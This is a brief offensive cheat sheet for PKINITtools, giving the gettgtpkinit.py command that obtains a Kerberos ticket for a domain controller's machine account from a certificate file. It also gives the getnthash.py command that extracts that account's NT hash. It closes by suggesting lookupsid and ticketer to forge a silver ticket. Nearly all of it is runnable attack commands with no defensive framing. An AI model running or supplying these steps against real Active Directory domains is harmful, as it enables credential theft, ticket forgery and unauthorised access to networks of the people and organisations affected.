# getnthash.py

Retrieves the NT hash of an account (for example, after using gettgtpkinit.py to obtain the AS-REP key that accompanies a TGT).

# Extract NT hash

This step requires the AS-REP key you got as part of using gettgtpkinit.py.

```bash
export KRB5CCNAME=x.ccache
getnthash.py domain.com/server123\$ -key THE-AS-REP-HASH
```

# Request a TGT using a certificate and private key

```bash
# Escape the trailing $ of the machine account name, as in the getnthash.py call
gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc\$ dc.ccache
```

Armed with this hash, you could grab the domain SID with lookupsid and then forge a silver ticket with ticketer.